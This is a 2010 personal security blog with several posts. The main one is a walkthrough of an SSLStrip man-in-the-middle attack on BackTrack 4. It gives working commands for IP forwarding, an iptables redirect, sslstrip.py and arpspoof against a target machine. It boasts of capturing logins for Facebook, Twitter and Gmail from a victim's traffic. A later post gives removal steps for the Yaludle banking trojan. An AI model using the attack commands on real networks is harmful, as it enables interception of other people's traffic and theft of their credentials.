Jan 30 2010

Quick Update

Category: PracticalParker @ 7:17 pm

Well, it certainly wasn’t quick, but I have taken some time to organise things a little better within the malware sample section and have also added my personal twist to the WordPress theme I use.

Not awe inspiring, but think it looks OK.

Jan 24 2010

Backtrack 4 & SSLStrip-0.7 at last!

Category: Password Stealing,PracticalParker @ 9:56 pm

OK,

So I have been wanting to document this for a while, but have failed to do so. Luckily time and the recent BackTrack4 final release have conspired with me today, so I have been able to do it at last. So, sitting comfortably? Here comes the science bit.

Before you do this, I suggest you have the following installed; SSLStrip and Python. Make sure you also have a Linux distribution (such as BackTrack) and hardware combo that supports ARP injection. Once all of that is in place, you can conduct what is a very simple attack. (For reference I use an Acer Aspire One Z250 and Backtrack 4)

  • First enable port forwarding with the following command into a terminal window  echo “1″ > /proc/sys/net/ipv4/ip_forward
  • Then define what traffic you wish to capture (always port 80, I would think) and which port you will forward this traffic to. The values in bold should be replaced with the relevant ports iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port <listenPort>


  • You must now use that clever man’s python script to start stripping out the SSL, matching the listenPort with that above  python sslstrip.py -l <listenPort>

Having set your machine to pick up, forward and inspect all the traffic from your target machine, we now need to do is ensure that all the traffic from your target machine is routed through your hardware.  We do this with a Man In The Middle attack, placing yourself between the target machine and the network router.
We achieve this with a simple ARP attack, which continues to ‘inform’ the target machine that you are the router, with which it wishes to speak.

  • Within a new terminal window (to keep it clean, if nothing else), enter the following, (values in bold should be replaced with relevant values) arpspoof -i <interface> -t <targetIP> <gatewayIP>


Now all you need do is wait, all the target machine’s traffic will route though your machine and their browsing will probably seem slow, but any sites which they visit, who implement poor SSL encryption will be easy prey. The data that is captured will be placed into a .log file and available by opening a new terminal and entering more sslstrip.log (ensuring you are in the SSLStrip directory)

You’ll note that such popular sites as www.facebook.com / www.twitter.com and the “newly secure” www.gmail.com are all easy pickings!

Details captured by SSLStrip

I thank you!

Jan 14 2010

MitM attack with SSLStrip

Category: PracticalParker @ 8:24 am

Urm, got kind of distracted of late and haven’t got around to documenting how you conduct the same LAN attack. Have just found out that BackTrack4 Final has been released though, so I will install that and then do it. I promise

Tags:

Jan 04 2010

Yaludle

Category: Malware,Practical,Programs,TrojanParker @ 9:27 pm

Well another virus that’s on the radar, this time one carries an alias of Yaludle.
No real info re the installer, or exploit type but suffice to say this one is bad news and by replacing a number of key drivers within your registry, it ensures that it loads up every time your PC does.

As a very quick synopsis of the risks, this virus is capable of Man In The Browser / Man In The Middle attacks to take place, which will typically go after your banking credentials but as with many banking trojans, it is not against going after your other sensitive info with keylogging.

Anyway, to get rid of it, you need to do as follows;

  1. Close all instances of Internet Explorer.
  2. Open ProcessExplorer and Regedit.
  3. Get the DLL name from the registry key => HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\midi2 and write it somewhere. Should be in the format of 8 hex digits + 1.
  4. Use ProcessExplorer to search for that hex value. Locate and close all found handles that have that value (some may be mutex objects). In ProcessExplorer => View => Lower Pane View => Handles (or Ctrl+H) Find => Find Handle or DLL Search the first 4 digit of the file. You get a list of handles that relates to the malware. Close them with ProcessExplorer or handle.exe.

Delete these registry keys:

  • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\midi2
  • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\wave1
  • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\aux2
  • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\mixer2
  • HKCU\Software\Macromedia\
  • HKCU\Software\AppDataLow\Software\Macromedia\
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WAB

Delete these files:

  • %Appdata%\ Macromedia \Common\
  • %Appdata%\Macromedia\Common\
  • (8-digit-hex).exe
  • %TMP%
  • (8-digit-hex).tmp

I also recommend clearing the Temp folders on that machine.

  • %Temp%
  • %Systemroot%\Temp

Having done all of that, a restart of the machine should load without any malicious Yaludle items present. For peace of mind, you can repeat step 4 of the above to ensure that no handles or other loaded objects still carry that hex value.